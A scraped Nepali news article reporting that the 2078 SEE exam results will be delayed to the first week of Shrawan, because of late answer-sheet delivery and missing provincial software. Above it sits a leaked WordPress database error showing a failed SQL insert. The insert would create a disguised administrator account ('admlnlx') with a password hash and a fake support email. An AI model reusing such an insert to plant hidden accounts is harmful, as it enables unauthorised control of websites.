WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B894M/Tx/00Rtv2OLMdGYr9PbAhl1Q.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:15:24', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । २०७९ वैशाख ९ गतेदेखि २० गतेसम्म सञ्चालन भएको २०७८ सालको माध्यामिक शिक्षा परीक्षा एसईईको नतिजा साउन पहिलो हप्ता सार्वजनिक हुने भएको छ ।
यसअघि असार मसान्तभित्र नतिजा सार्वजनिक गर्ने माध्यामिक शिक्षा परीक्षा कार्यलयले बताउँदै आएको थियो । सबै परीक्षण केन्द्रहरुबाट विद्यार्थीको उत्तरपुस्तिका केन्द्रमा ल्याउन बढी समय लागेकाले नतिजा सार्वजनिक गर्न ढिलाइ भएको हो ।
देशभरका ५६ परीक्षण केन्द्रहरुबाट उत्तरपुस्तिका असार २१ गते एसईई परीक्षा नियन्त्रण कार्यलयमा जम्मा भएको थियो । राष्ट्रिय परीक्षा बोर्डले यो वर्ष विद्यार्थीहरुको प्राप्ताङ्क प्रदेशले नै अपडेट गर्ने बताउँदै आएको थियो । तर, प्रदेशमा अपडेट गर्ने सफ्टवेयर जडान तुरुन्तै नभएकोले यो पटक केन्द्रबाटै सबै नतिजा सार्वजनिक हुने भएको छ ।